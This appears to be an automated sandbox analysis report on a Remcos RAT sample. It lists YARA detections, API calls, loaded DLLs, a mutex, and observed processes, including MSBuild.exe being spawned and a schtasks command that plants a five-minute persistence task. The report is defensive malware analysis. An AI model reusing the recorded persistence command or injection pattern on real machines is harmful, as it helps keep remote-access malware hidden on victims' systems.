                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_004167B4
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeCode function: 8_2_00007FFD345886FA8_2_00007FFD345886FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043E0CC9_2_0043E0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041F0FA9_2_0041F0FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004541599_2_00454159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004381689_2_00438168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004461F09_2_004461F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043E2FB9_2_0043E2FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0045332B9_2_0045332B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0042739D9_2_0042739D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004374E69_2_004374E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043E5589_2_0043E558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004387709_2_00438770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004378FE9_2_004378FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004339469_2_00433946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044D9C99_2_0044D9C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00427A469_2_00427A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041DB629_2_0041DB62
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00427BAF9_2_00427BAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00437D339_2_00437D33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00435E5E9_2_00435E5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00426E0E9_2_00426E0E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043DE9D9_2_0043DE9D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00413FCA9_2_00413FCA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00436FEA9_2_00436FEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00434E10 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00434770 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401E65 appears 34 times
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2246745848.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs 41DLTjkmOm.exe
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2249189154.000000001C130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs 41DLTjkmOm.exe
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@13/8@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00417952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F474
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\MangoDB[1].ytypJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-SIVP85
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
                  Source: 41DLTjkmOm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 41DLTjkmOm.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 41DLTjkmOm.exeVirustotal: Detection: 22%
                  Source: 41DLTjkmOm.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeFile read: C:\Users\user\Desktop\41DLTjkmOm.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\41DLTjkmOm.exe "C:\Users\user\Desktop\41DLTjkmOm.exe"
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Lamsses.exe C:\Users\user\AppData\Roaming\Lamsses.exe
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
